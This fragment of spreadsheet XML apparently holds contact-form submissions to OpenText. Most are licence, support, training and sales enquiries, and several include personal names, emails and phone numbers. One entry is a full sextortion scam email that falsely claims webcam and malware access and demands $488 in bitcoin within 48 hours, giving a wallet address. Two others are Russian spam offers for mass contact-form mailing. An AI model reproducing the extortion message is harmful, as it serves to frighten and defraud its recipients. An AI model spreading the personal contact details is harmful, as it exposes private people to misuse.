Ref#   21539   I am a Senior Space Planning Specialist within the commercial field. CORPORATE ACADEMIC INDUSTRIAL</t>
  </si>
  <si>
    <t xml:space="preserve">I need assistance in adding a new user SMitchell. When I try to add them it says that an SMitchell already exists, but SMitchell doesn't show up on our list of current users. </t>
  </si>
  <si>
    <t>We are assessing on premise solutions that process 837 format claims EDI files from CMS. The requirement is to take the daily 837 file and process it to a relational database output. _x000D_
It appears you provide such software, but the site is not specific. We would be interested in discussing any solutions you provide that may suit this need. Thank you.</t>
  </si>
  <si>
    <t>We are looking to implements a dashboard that can match all swift messages with their corresponfing status updates.  We the option filtering by trade details and drilling int the messages._x000D_
_x000D_
Is this something Opentext offers.</t>
  </si>
  <si>
    <t>EDI Easylink</t>
  </si>
  <si>
    <t>I'm needing a quote on the earliest version of Alchemy Extract you support. _x000D_
_x000D_
Thank you_x000D_
_x000D_
Reinhard</t>
  </si>
  <si>
    <t>We have existing licenses for Exceed and Exceed 3D and would like to get the latest version.  Our contract number is 0012253429.</t>
  </si>
  <si>
    <t>I am looking for the coordinates (email) of Mr Thomas (Tom) Jenkins' assistant. Would someone be able to direct me to the correct person?_x000D_
Thank you very much_x000D_
Monique_x000D_
_x000D_
Monique Bossé_x000D_
Executive Assistant to Senior Deputy Governor Carolyn Wilkins_x000D_
Bank of Canada _x000D_
234 Wellington Street _x000D_
Ottawa, ON  Canada  K1A 0G9_x000D_
Bus/Bur: 613 782-7307</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Pourriez-vous me faire parvenir un devis pour votre formation "Implementing Document Management using eDOCS DM V5 3.1" svp ?_x000D_
Ainsi que vos dates et lieux de formation ?_x000D_
merci pour votre aide._x000D_
Virginie Thun</t>
  </si>
  <si>
    <t>I have a shipment coming in from japan to you.  Need your assistance</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, _x000D_
We at HCL provides Supply Chain Business Services to our clients which encompasses Sourcing, Procurement, Logistics and Master Data Management Services. _x000D_
We are evaluating partners who we can tie up for Master Data Platform and solution to fast track Master Data Cleansing, Data Maintenance, Data Migration etc. for our existing clients and prospects. In light of same, we request you to please share your Product Portfolio (Brochure, case studies etc.) with us at the earliest. _x000D_
Looking forward to receive the required information with a hope to take this discussion to next level._x000D_
Thanks &amp; Regards,_x000D_
Sachin Kumar _x000D_
SCM Consultant_x000D_
Cell - +91 9561869421_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Federico, from the Premium Publishers division at Harrenmedia. _x000D_
_x000D_
I'm reaching out as we have worked together in the past and we want to resume our partnership._x000D_
_x000D_
We have demand composed by campaigns coming from agencies and top marketplaces and we are seeing very good results with similar publishers such as OpenText._x000D_
_x000D_
Please let me know if we can set up a call in order to discuss our possibilities together._x000D_
_x000D_
Thanks in advanced!_x000D_
</t>
  </si>
  <si>
    <t>We purchased Brava Desktop at 09:45 this morning via your web site, but we have received no email confirmation of how to download the software and install it on our machine. Is this delay usual? Your assistance would be greatly appreciated.</t>
  </si>
  <si>
    <t>I need access to the My Support portal because SAP requires access for downloading patches during system installation.</t>
  </si>
  <si>
    <t xml:space="preserve">looking for  WebtopBHOInstaller.msi </t>
  </si>
  <si>
    <t xml:space="preserve">Good morning._x000D_
Around hour ago i have changed the email address for my account to ISlicenses@pilkington.net .Could You please revert this as this email address is incorrect?_x000D_
_x000D_
Gryzan Patrycja_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Dear opentext good morning I need your help, because I have an error in our brava licenses with the following error "this computer two not have administration rights for the license manager service"Maybe it's because the licenses were expired please your help. thanks</t>
  </si>
  <si>
    <t>MW</t>
  </si>
  <si>
    <t>Wanted to find out how much the following licence renewals/reinstatement would cost?_x000D_
1.   EnCase licence no. 1001-03-140-0021 to be upgraded to latest version_x000D_
_x000D_
2.   TD2U licence no. E2751009 1652(TD2)</t>
  </si>
  <si>
    <t>I'm integrating Open Text Extended ECM to our Salesforce Org. But due to lack of resources I'm not able to do so. So I need help from your side to help me integrate the Open Text Extended ECM to the org. We have already purchased the license so please help me integrating the software.</t>
  </si>
  <si>
    <t xml:space="preserve">I am registered to take online OpenText training's but I am having trouble accessing the learning materials. </t>
  </si>
  <si>
    <t>RS</t>
  </si>
  <si>
    <t>NIS j.s.c. Novi Sad would like to inform you about our big future project Enterprise Content Management System and to ask you to participate in our workshop and later in official prourement procedure. Last week I sent our RFI to the following e-mail address partners@opentext.com, but unfortunately I havent't received feedback from your side.</t>
  </si>
  <si>
    <t xml:space="preserve">We still have the problem that with the purchased license no DWG files can be opened._x000D_
_x000D_
The Software says: _x000D_
Format Not Licensed_x000D_
This file Format is not licensed or an embedded file is not licensed._x000D_
Contact your supplier for licensing details._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Liebes Team von opentext,_x000D_
_x000D_
Gerne möchte ich mich Ihnen kurz vorstellen._x000D_
Mein Name ist Gereon Schulz und ich arbeite für Circle Training International._x000D_
Wir haben unseren Sitz in Neitersen (Kreis Altenkirchen, Westerwald) und sind ein internationaler Trainingsanbieter von Trainings in den Bereichen Vertrieb, Verhandlung und Präsentation. Mehr Informationen zu unserer Arbeit finden Sie auf unserer Website._x000D_
 _x000D_
Heute möchte ich Sie in Bezug auf zwei unserer Veranstaltungen ansprechen, die wir hier vor Ort im Waldhotel Rheinbach durchführen werden:_x000D_
 _x000D_
25.-26.04.2019 Erfolgreich Präsentieren und Auftreten –_x000D_
_x000D_
 _x000D_
 _x000D_
03.-04.06.2019 Basic Coaching Training –_x000D_
_x000D_
 _x000D_
Eventuell ist dieses Angebot für die Mitarbeiter Ihres Unternehmens von Interesse._x000D_
 _x000D_
Herzliche Grüße_x000D_
 _x000D_
Gereon Schulz</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
mich würde interessieren, ob in Ihrem DMS/ECM qualifizierte Zeitstempel bzw. Signaturkomponenten eingesetzt werden?_x000D_
_x000D_
Wir, das DGN Deutsche Gesundheitsnetz Service GmbH betreiben seit dem Jahre 2007 unser hauseigenes, mandantenfähiges Trustcenter, welches durch die Bundesnetzagentur akkreditiert ist (Gütezeichen BNetzA Nr. Z0033). Mehr als zehn Jahre haben wir als Zertifizierungsdiensteanbieter (ZDA) qualifizierte Signaturkarten nach Signaturgesetz (SigG) produziert._x000D_
_x000D_
Heute sind wir qualifizierter Vertrauensdiensteanbieter (VDA) nach der europäischen Signaturverordnung eIDAS für elektronische Identifikationssysteme und digitale Signaturen (electronic Identification and Signature)._x000D_
_x000D_
Sollte bei Ihnen im Rahmen der Digitalisierung und Qualifizierung von Dokumenten der Einsatz von qualifizierten Zeitstempeln zum Einsatz kommen, würde wir uns über eine Partnerschaft freuen._x000D_
_x000D_
Gerne stehe ich Ihnen bei Rückfragen als persönlicher Ansprechpartner zur Verfügung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Steffen Bucksteeg | DGN_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi, we are currently using Team Developer 6.3 together with Oracle database 12.1 and 12.2. Everything is running fine, but just now we tried upgrading to Oracle 18.3 and we are getting multiple issues around our application. Mostly our application just crashes without any error message, but we are also getting some strange "Parameter missmatch" which didnt occur in previous Oracle versions and the error messages seems bogus because its the same code running._x000D_
_x000D_
So basicly we are wondering if perhaps Oracle version 18.3 isnt supported by Team Developer 6.3? Or if you have any other information that could be helpful._x000D_
_x000D_
Best regards_x000D_
Vigor Larsson_x000D_
Equinor ASA</t>
  </si>
  <si>
    <t>we are central government laboratory one of our Encase 8 dongle(physical key) is showing Red light and not recognised by software even if we are able to see it as codemeter dongle on PC. please help and assist us as soon as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear all,_x000D_
We will send you a request for information about e-discovery software. Can you send us an info email adress?_x000D_
With kind regards,_x000D_
Anja Peerenboom_x000D_
j.e.m.peerenboom@dnb.nl_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I received the below email but i am unable to gain access to retrieve this _x000D_
_x000D_
OpenText Email Notification_x000D_
_x000D_
A new document has just arrived in your Inbox._x000D_
_x000D_
Type of Document        : ORDER _x000D_
Sender                  : World Duty Free Group_x000D_
Receiver                : Gusto Telecom Solutions Ltd_x000D_
Date                    : Mar/06/2019 15:26 GMT_x000D_
Version/release number  : 1_x000D_
Document Reference      : 423909_x000D_
_x000D_
_x000D_
You can access this document from your Inbox on OpenText at:_x000D_
tradinggrid gxs com TigerPortal_x000D_
_x000D_
_x000D_
NOTE: This e-mail is automatically generated. Please do not reply to this e-mail.  Replies to this e-mail can not be answered._x000D_
</t>
  </si>
  <si>
    <t>My account can't use "Support", please help me solve it. Thanks</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I'm hoping you can help me. We are conducting pre-engagement screening on someone who used to work for yourself, and we're wondering if you've got an inbox we can send a reference request to?_x000D_
The contact email address that we were provided has come back with an automated reply, stating that the person is out of office until the 4th of March, so I'm not sure she is back yet?_x000D_
_x000D_
Any help with this would be much appreciated,_x000D_
Best_x000D_
Carina</t>
  </si>
  <si>
    <t>SASGUI ne fonctionne plus - peut être un problème Opentext ?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren!_x000D_
Unter der Lieferkundennummer: 10175485 und Rechnungskundennummer: 10069191 müssten wir bei Ihnen als Kunden gelistet sein. _x000D_
Hiermit möchte ich mich bei Ihnen als Administrator für Systemanwendungen mit einer Anfrage bezüglich des Produktes "DOCUMENTUM" melden, für welches wir, laut meiner Information bei Ihnen Support beziehen._x000D_
Zu benanntem Produkt benötige ich zeitnah von Ihnen technische Unterstützung. Es muss für das Produkt ein neues "Repository" eingerichtet werden._x000D_
Hierzu benötige ich wenn möglich einen Vor Ort Support. Bitte unterbreiten Sie uns gern ein Angebot für Ihre Aufwendungen!_x000D_
Über eine Nachricht von Ihnen würde ich mich freuen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Stefan Kloock</t>
  </si>
  <si>
    <t>Hello, we are planning to move for ECC to S/4 HANA. As S/4 HANA version we planned to installed requires higher 16.3 version of VIM (currently installed version 7.5), i would like to see more details / requirements / ... for this new VIM version. I do not know if Deutsche Telekom bought a support service, so not sure if you can check it, or what would you recommend to grant access to support portal (I guess this is only location where i could find details to v 16.3). thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We have a request for one of our clients in Kuwait to establish a Forensics Lab for cyber security  for them and we have found that your solutions is perfect for that . _x000D_
_x000D_
How we can cooperate in this field and is there a way that we become your partner for the Kuwait ?_x000D_
_x000D_
Thank you_x000D_
Best regards_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Pengajuan untuk gofood /goresto</t>
  </si>
  <si>
    <t xml:space="preserve">On the march 6, I joined OpenText recruitment session and completed a digital form. they said that they will send us email, but did not receive until now. Is it possible to connect me to them? </t>
  </si>
  <si>
    <t>Con cursos</t>
  </si>
  <si>
    <t>I would like to talk to you about your services and how they can assist me, you have come recommended,_x000D_
Thanks _x000D_
Adam</t>
  </si>
  <si>
    <t>I'm not sure if this is the right solution for me. I'm just looking for a simple way to search our scanned engineering drawings.</t>
  </si>
  <si>
    <t>I can't login in to update my software. The link for opentext doesnt work. My email Hema.kotecha@northants.pnn.police.uk.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I want training on Web Site Management Server (CMS) version 16 , Please provide the answer of the below mention queries and add if you want to provide any more information._x000D_
•	What topics will cover in the training session?_x000D_
•	 Training cost?_x000D_
•	When we can start a training session._x000D_
•	Time Duration?_x000D_
_x000D_
Regards,_x000D_
Shlok</t>
  </si>
  <si>
    <t>I need a vehicle to get  my job services going</t>
  </si>
  <si>
    <t>Internship</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a fourth year Electronics Engineering student from FEU-Institute of Technology who wishes to apply for an internship position in your company. </t>
  </si>
  <si>
    <t>Your South African offices telephone number and fax number are incomplete.  There is no (phone number) code</t>
  </si>
  <si>
    <t>I need a loan please thank you</t>
  </si>
  <si>
    <t>CM</t>
  </si>
  <si>
    <t>Здравствуйте! _x000D_
 _x000D_
Предлагаю разослать Ваше коммерческое предложение в формы обратной связи сайтов по всей России _x000D_
 _x000D_
В базе более миллиона сайтов, от Вас нужны только тема сообщения и текст. _x000D_
По стоимости договримся здесь sbrodov.grigoriy@mail.ru</t>
  </si>
  <si>
    <t>Hello,  _x000D_
_x000D_
I would like to obtain a list of companies using ProVision.  I am a job seeker with 13 years of experience using this software and would like to continue to expand my skills and knowledge with this tool working for a company that realizes the value ProVision can bring to their business operations and strategic decision making._x000D_
_x000D_
Can you assist with this request?  _x000D_
_x000D_
Thank you and best regards,_x000D_
--Deidre Howard</t>
  </si>
  <si>
    <t>looking training details</t>
  </si>
  <si>
    <t xml:space="preserve">hi i cannot activate my login and password. i need to download the latest version of encase. </t>
  </si>
  <si>
    <t>Имеющиеся категории баз: _x000D_
- Строительство: ~350 тыщ сайтов _x000D_
- Медицина: ~300 тыщ сайтов _x000D_
- Все сайты Москвы 1.5 млн сайтов _x000D_
- Отели / гостиницы: ~530 тыщ сайтов _x000D_
И огромная база сайтов в размере 150 млн в разных доменных именах _x000D_
ru/com/org/biz/kz/by и тд _x000D_
 _x000D_
Цена рассылки 999 рублей по указанным выше категориям _x000D_
Рассылка по всем базам 4999 руб. _x000D_
Рассылка по 150 млн сайтов - 29 990 руб _x000D_
Сроки рассылки от 1 до 5 дней. _x000D_
 _x000D_
Отличная доходимость писем до адресата через web сайт компании! _x000D_
 _x000D_
Если вам нужна рассылка пишите на почту: ivanproweb@mail.ru</t>
  </si>
  <si>
    <t>IM</t>
  </si>
  <si>
    <t>Hеllо! _x000D_
 _x000D_
As yоu mаy havе nоtiсеd, I sеnt уоu аn еmаil from your асcount. _x000D_
This mеans thаt I have full ассеss to yоur acсоunt. _x000D_
 _x000D_
I've been wаtсhing you for sеverаl months now. _x000D_
The fасt is that уou wеre infесted with mаlwаrе thrоugh an аdult sitе that you visitеd. _x000D_
 _x000D_
If yоu are nоt familiаr with this, I will еxрlain. _x000D_
Trojаn Virus gives mе full accеss аnd сontrоl оvеr a соmputеr оr оthеr dеvicе. _x000D_
This meаns thаt I can sеe еvеrуthing on уour screen, turn on thе camera аnd micrоphone, but you do nоt know abоut it. _x000D_
 _x000D_
I also hаve acсеss tо all уоur сontаcts and all уour соrresроndenсe. _x000D_
 _x000D_
Whу уоur antivirus did not dеtеct mаlwаre? _x000D_
Answer: My malware uses а drivеr, I uрdate its signatures еvеry 4 hours sо thаt yоur аntivirus is silent. _x000D_
 _x000D_
I madе а vidеo shоwing how sаtisfiеd уоu аrе in the left half of thе scrеen, аnd in thе right hаlf уоu seе the video yоu wаtсhеd. _x000D_
With one сliсk of thе mоuse, I cаn send this vidео tо аll уour emаils аnd сontасts оn sоcial netwоrks. _x000D_
I саn аlso рublish aсcеss tо аll your email аnd instаnt mеssеngers thаt уоu use. _x000D_
 _x000D_
If уou want tо рrevеnt this, _x000D_
transfer thе аmоunt of $ 488 to mу bitсоin addrеss (if you dоn’t know how to dо this, writе to Gоoglе: “Buу Bitсoin”). _x000D_
 _x000D_
My bitсоin address (BTС Wаllеt): 35MJPZrPRqBy5mEkPVchWTG7QrqxygsBgG _x000D_
 _x000D_
Аftеr receiving thе рaуmеnt, I will dеlеte thе videо аnd you will nevеr hеar mе agаin. _x000D_
I give уou 48 hours tо рау. _x000D_
I have a notifiсаtion that this lettеr hаs bееn reаd, аnd the timеr will work whеn you sеe this lеttеr. _x000D_
 _x000D_
Filing а соmplaint somewhеrе dоes not mаkе sеnse bеcаusе this email cаnnot bе trасked аs my bitcoin аddrеss. _x000D_
I do not makе anу mistakes. _x000D_
 _x000D_
If I find thаt you have shаrеd this messagе with somеone elsе, the vidео will bе immеdiatеlу distributed. _x000D_
 _x000D_
Best wishеs!</t>
  </si>
  <si>
    <t>We have an interesting picture of #BalanceforBetter from our interventions. We are a NGO. Let me know if you will talk about the same if it interests you. Thanks Ms Mandir Tendolkar, Mumbai, India</t>
  </si>
  <si>
    <t>We have discovered a directory traversal security issue during a customer engagement using the OpenText FirstClass product.  This results in disclosure of sensitive files within the webserver operating system including sensitive files which could result in the compromise of the platform._x000D_
_x000D_
Please let me know how you want to be communicated to about this issue.</t>
  </si>
  <si>
    <t>My customer, Catholic Health Initiatives, has Application Extender and is looking for migration services.  Can you please provide a contact for this customer?</t>
  </si>
  <si>
    <t>The Art Institute of Chicago is in the process of identifying a replacement for our current DAMS system which was developed in house and would like to start discussions about that effort. _x000D_
_x000D_
Brian Jucas_x000D_
Director of IS PMO</t>
  </si>
  <si>
    <t>Dear Madam, dear Sir_x000D_
_x000D_
I installed Brava! FreeDWG Viewer today. When I try to open an AutoCAD file, I get the message "Invalid License. Unabe to load files. An update is required for Brava! FreeDWG Viewer. Please contact your supplier for an update."_x000D_
_x000D_
Can you help me?_x000D_
_x000D_
Thanks and kind regards_x000D_
_x000D_
Kurt_x000D_
_x000D_
P.S. I can send you a sample AutoCAD file, if you provide me with an email address.</t>
  </si>
  <si>
    <t>Colmena Seguros is evaluating the existing products in the market that support Document Management. We need a demonstration of the opentext solution to evaluate if it adapts to the needs of the company. We do not see representation in Colombia, so we appreciate to inform us if it is possible a video conference or a visit of a representative. Thank you_x000D_
_x000D_
Postdata: written with the help of Google Translator</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking into moving to a cloud based faxing service and I would like to arrange a meeting with a local partner to go over options for your offerings. Can this be arranged? </t>
  </si>
  <si>
    <t>Why do png files display incorrectly with transparent backgrounds in the first class email client? I have a round circular logo, so outside the circle should be the color of the page background, but it can tend to be white or black, but appears normal if I insert the logo.png file in a web page (using chrome or firefox to view). I use inkscape and gimp to work on image files, never had this problem before except I'm getting it now in the first class email client._x000D_
_x000D_
TIA!_x000D_
Michael</t>
  </si>
  <si>
    <t xml:space="preserve">We have a mailbox via the Information Exchange.  It is account id TRPR and user id of TRPR003.  I see that our certificate is about to expire on 3/26/19, but I have not received a notice from you regarding this.  We usually get a notice a couple of months in advance of the expiration to get new a certificate._x000D_
Please advise._x000D_
Thanks,_x000D_
James._x000D_
</t>
  </si>
  <si>
    <t>When attaching a file (.txt, .doc, .pdf) to a Opentext (FaxPress) fax the program gives me a faxpress error Cannot Fax File. Does not matter what kind of document. I create a MS Word doc with test fax as the only text in the document and it would not allow the fax. I printed the same document to Adobe and it would not let me send the pdf file. We need the FaxPress Program to let our users attach a file to send as a fax. Please tell me what I need to do to get it to attach a file and send the fax.</t>
  </si>
  <si>
    <t>I have not had access to the Guidance/EnCase support site since July of 2018 when our support ran out. I am being told that I should have had access but didn't. In the mean time, we have re-upped our support and it should show paid in your system retroactive to July of last year. I would like to get my ID reactivated so that I can log in for support.</t>
  </si>
  <si>
    <t xml:space="preserve">Currently we are doing a Communications Audit of all our Partner communication options for transmitting data._x000D_
_x000D_
We are thinking about making some communication changes and we need to know who it will affect and how it will affect our current and future partners. _x000D_
_x000D_
Below are a few questions that we would like to you to answer to assist in this audit process._x000D_
_x000D_
**Please forward this email to your Internet Security Department**_x000D_
_x000D_
Thanks_x000D_
_x000D_
1- For communications are you able to use FTP and AS2_x000D_
2- For communication endpoints do you support IP address and FQDN (FullyQualified DomainNames)_x000D_
3- Do you have edge routers or firewalls that block inbound or outbound comm's by IP or FQDN_x000D_
4- Do you / firewall support multiple backup IP addresses for endpoint comm's  _x000D_
5- Do you support TTL (Time to Live) values for FQDN_x000D_
6- Does your firewall support FQDN for communication endpoints_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I inadvertently deleted emails received this morning with my temporary Perceptiv password, links to the Perceptiv sites and instructions on changing the temporary password.  Can you please resend?  Thank you. </t>
  </si>
  <si>
    <t>Interested in sponsorship opportunities at EW.</t>
  </si>
  <si>
    <t>We have a software license (1278299 SN: X100008078067), i am trying to get access to client support to download Encase V8.08 but the support account belongs to Gonzalo Granile who left the company, could you please activate my account so we can get updates?_x000D_
_x000D_
I think my company have a global suport agreement._x000D_
_x000D_
Regards,_x000D_
_x000D_
Diego G.</t>
  </si>
  <si>
    <t>Holtec is looking to implement a document management software at one of our facilities. This software would be a replacement system for Documentum. Can you support a document migration from one document management system into your system?  What would be the cost of implementation, data migration, and any annual fees? How easy would it be to add a second site onto a new document management system if we like the system after a test period?_x000D_
_x000D_
Another requirement we will have is that we need to save all records on WORM media and have the records stored in a second independent location. Is this something your system can be configured to support?</t>
  </si>
  <si>
    <t>Looking for a document Descartes states was transmitted but never made it to Ariba CIG. I am not sure if Descartes ever established connectivity with Ariba CIG. There was a ticket 1-3527546798 open for this but it was closed before acceptable resolution was reached. I can provide payload of the 810 they are sending. Looking forward to hearing from OpenText. Thank you. -Rob</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
can you please provide pricing for DXP Perpetual License: Brava!_x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>Quote for renewal of v8 Encase dongles, serial license #G3002094503, G3002094505, G3002094506, G3002096155, and G3002094500.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We want sales this solution our client._x000D_
For this, what we doing for obtaining the distribution here en México._x000D_
 </t>
  </si>
  <si>
    <t>Information</t>
  </si>
  <si>
    <t>I am able to get this opportunity, willing and enthusiastic about internship. As you mentioned that I am from ECE, but I am not good even in one OOPS language and good in basics of C language._x000D_
Could you give me this opportunity to me in that I can prove myself why did you take me.</t>
  </si>
  <si>
    <t>Hello, I'm the SPOC from our company's end for handling the support portals and knoweldge hubs, though I cannot access them. So would you please provision full access to my user in order to track licenses that we have, provision other users for our employees, and access learning hub._x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are looking for pricing and brochures for the 2 port Fax Appliance.  </t>
  </si>
  <si>
    <t>PS</t>
  </si>
  <si>
    <t>Ich wende mich an Sie, weil die Einrichtung einer OFTP2-Verbindung zu unserem Geschäftsparter LEAR über GXS sich extrem in die Länge zieht und die Kommunikation zum verantwortlichen GXS-Team gelinde gesagt unterirdisch ist._x000D_
Die Firma LEAR hat GXS als VAN benannt. Leider ist eine direkte Kommunikation mit GXS für uns nicht möglich, alles muss über Ihr Portal erfolgen, zu dem nur LEAR einen Zugang hat. Dadurch bin ich gezwungen, meine Mailantworten immer erst an LEAR zu senden, die diese dann entsprechend weiterleiten. So geht das jetzt schon über 3 Monate. Meine Bitte einer direkten Kommunikation wird dabei ignoriert. Und wir arbeiten ständig aneinander vorbei: Heute habe ich z.B. bemerkt, dass GXS versucht hat, eine OFTP2-Verbindung zu uns aufzubauen mit einem anderen Passwort als sie uns mitgeteilt haben. Und ich erhalte keinerlei Info dazu..._x000D_
_x000D_
Der Fall wird bei Ihnen wohl unter 168714.001 geführt. Ich hoffe, dort ist alles bisherige vermerkt._x000D_
_x000D_
Haben Sie die Möglichkeit, mir einen Ansprechpartner zu vermitteln, mit dem ich die Verbindung austesten kann, evtl. sogar deutschsprachig und direkt per Telefon oder Mail? Das wäre großartig.</t>
  </si>
  <si>
    <t xml:space="preserve">I need contact information for our account rep., our Sourcing department needs to contact them to check if we are licensed to use of Liquid Office.  </t>
  </si>
  <si>
    <t xml:space="preserve">I'm working with a customer in the State of Missouri and need a contact to work with so I can provide information/demo for the customer.  </t>
  </si>
  <si>
    <t>We are interested in getting a demo of the Archive Center tool and also what the cost is.</t>
  </si>
  <si>
    <t xml:space="preserve">I used Brava Reader at a former company, it was excellent for opening and working with drawings.  Do any of your programs allow opening of .prt files?  </t>
  </si>
  <si>
    <t>Job</t>
  </si>
  <si>
    <t>Hi there_x000D_
_x000D_
I registered but do not have Access to My Support or the Knowledge base._x000D_
We have a Customer Support contract and other people of my organisation already have access._x000D_
_x000D_
Can you please give me access or let me know what information is needed in order to give me the access?_x000D_
_x000D_
Thank you and best regards, Stefan</t>
  </si>
  <si>
    <t>On 2 occasions in the past week we have had DesAdv's fail because another customer's envelope information is being pulled in. This information is from exactly 1 year prior. What else is odd is that I cannot find that customer's information in our system anymore (Orphaned Data). We are on version: 6.04.01</t>
  </si>
  <si>
    <t>I have registered support user with email address itsd@sca.com_x000D_
I have got the confirmation email and confirmed the address 4 times but it keeps prompting to send confirmation all over again...</t>
  </si>
  <si>
    <t>Make Gupta Team Developer ... not just great, but modernize it!_x000D_
1. Completely display the paths of the (last) opened file in the window title bar and in the drop-down menu File._x000D_
2. Highlight each occurrence of a highlighted variable in the editor._x000D_
3. In the editor, make the depth of the indentation for IF and LOOP configurable._x000D_
4. Connect the first letter of lines before and after indentation by a vertical line.</t>
  </si>
  <si>
    <t>I'd like to regain support access but in the meantime, we are on (HP) version 8.6.105 build 15934 and considering upgrading (to stay current, no particular issue at the moment).  At the same time we would like to migrate from SQL Server (ancient version) to Oracle 18c for the design database.  So, is there a clear upgrade path and does (or when will) Exstream support Oracle 18c?_x000D_
_x000D_
FWIW, the actual support account might be lsnow@dhhs.state.nh.us.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I'd like to ask for permission to use the excellent article on Artificial Intelligence from Martin Richards in the next issue of Oil Review Africa. We will give Martin the byline and provide a link to the OpenText website in the article._x000D_
_x000D_
Thank you so much and I look forward to hearing from you soon._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Georgia</t>
  </si>
  <si>
    <t>☀️ _x000D_
Ỵоս ḥaⅴe a ɠṛeaṭ ḅսṣіnеsṣ! Cоṇgṛaṭuḷatiоṇṣ! Yoꭒ are ̣̣̱ꬶṛеat! _x000D_
Do not forget that business is a huge responsibility. _x000D_
But the question continues to torment me: “What is business from a practical point of view?</t>
  </si>
  <si>
    <t>What is the pricing structure for 50-100 user.</t>
  </si>
  <si>
    <t>Please can you recommend a professional drawing graphic tablet with pen, that is compatible with Brava software.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,  I am interested in booking 3 place on the DF120 - Foundations in Digital Forensics (21-25 May 19 - Reading) in respect of myself and members of my team from MOD Corsham. We are in possession of Purchase Order numbers and invoicing contacts within our finance department here at MOD Corsham.  Can you advise on the best way to proceed </t>
  </si>
  <si>
    <t>May I know the contact number of your good office here in Manila?</t>
  </si>
  <si>
    <t>I want to play Garry's mod</t>
  </si>
  <si>
    <t>Guten Tag_x000D_
Unser Kunde dbi services will einen Messestand machen._x000D_
Darauf ist das Logo "Opentext Partner" als Partnerlogo abgebildet._x000D_
Könnten Sie mir bitte das Logo als Illustrator oder EPS Dokument schicken?_x000D_
Es eilt._x000D_
_x000D_
Andreas Höferlin_x000D_
a.hoeferlin@idenko.de</t>
  </si>
  <si>
    <t>Hi, My company is planning to upgrade Exstream from 16.0 to 16.4. _x000D_
If you have done similar upgrade, could you please share these details._x000D_
Thanks a lot.</t>
  </si>
  <si>
    <t>We're the preferred supplier to DST Bluedoor, who have approached us wanting a quote to renew your opentext product as they're unable to process this directly with opentext. Could we please have a valid re-sale quotation suitable for partner resale? EU0037330     Thanks</t>
  </si>
  <si>
    <t>I need to see how the software works i have clients that need DMS</t>
  </si>
  <si>
    <t>Hi, _x000D_
I am looking for Customer Communication Management capabilities for one of our client in Health insurance sector. The client is based out of Mumbai, Goregaon</t>
  </si>
  <si>
    <t>❤️ _x000D_
Yoս have a gṛeat ᶀꭒsіness! Coṇgraṭꭒḷaṭіоns! Yoꭒ are ̣̣̱ꬶṛеat! _x000D_
Do not forget that business is a huge responsibility. _x000D_
But the question continues to torment me: “What is business from a practical point of view?</t>
  </si>
  <si>
    <t>We would like to be a Partner with you in selling your solutions</t>
  </si>
  <si>
    <t>I can't get into Support to ask questions, please help me solve it, thanks</t>
  </si>
  <si>
    <t xml:space="preserve">we help your organisation decrease expenditure and increase savings on your foreign currency exchange up to 10-15% less on the current expenditure of International Business travel Needs._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sorry I didn't mean to delete anything my tablet keeps freezing and didn't know I deleted it until  it refreshed I was just pushing everything to get it to do something</t>
  </si>
  <si>
    <t>We are looking for a cloud-based DMS for a small legal department, but that can scale to include other departments other than legal.</t>
  </si>
  <si>
    <t>Need to set up a catalog relationship, with Macy's as our first TP._x000D_
_x000D_
Thanks_x000D_
Andy</t>
  </si>
  <si>
    <t xml:space="preserve">I want to check if our contract has access to "support". We start paying you online and I cannot access pay bill. </t>
  </si>
  <si>
    <t>Hi_x000D_
I used to work in Opentext between sep 2017 and Dec 2017 as a coop student from the University of Waterloo, may I ask for a tax return form?</t>
  </si>
  <si>
    <t>Please provide me with the names of the users associated with account EU0186309 Capstone Investment Advisors</t>
  </si>
  <si>
    <t>I would like to know the cost of increasing our software license.</t>
  </si>
  <si>
    <t>I do not understand the differences between Exceed and Exceed OnDemand.  Also does Exceed 3D Plugin work with Exceed OnDemand? And what is the latest version of Exceed and Exceed OnDemand?  Thanks!</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, für das kommende Semester plane ich einen Workshop zum Thema eDiscovery für Jura-Studenten der HU-Berlin. Dort sollen sie zunächst eine Einführung in die Materie bekommen und dann einen Tag lang die Software ausprobieren können, um ein Gefühl davor zu bekommen, wie eDiscovery funktioniert und um später einen Vorteil auf dem Jobmarkt zu haben, weil sie das Grundkonzept verstanden und die Software in den Grundzügen bedienen können. Könnten Sie sich eine Kooperation vorstellen? Die (ca. 15) Studenten bräuchten nur für einen Samstag Zugriff auf einen Datensatz (Enron bspw.), den sie mit Ihrer Lösung bearbeiten können._x000D_
_x000D_
Vielen Dank im Voraus und mit besten Grüßen_x000D_
_x000D_
Nuri Khadem-Al-Charieh</t>
  </si>
  <si>
    <t>Gary Bluhm is leaving OpenText and is not returning emails.  I forgot who our new sales rep is.  I requested help with a possible migration from Documentum to OpenText and want to start evaluating the products.   Please provide me with our new sales rep contact information.</t>
  </si>
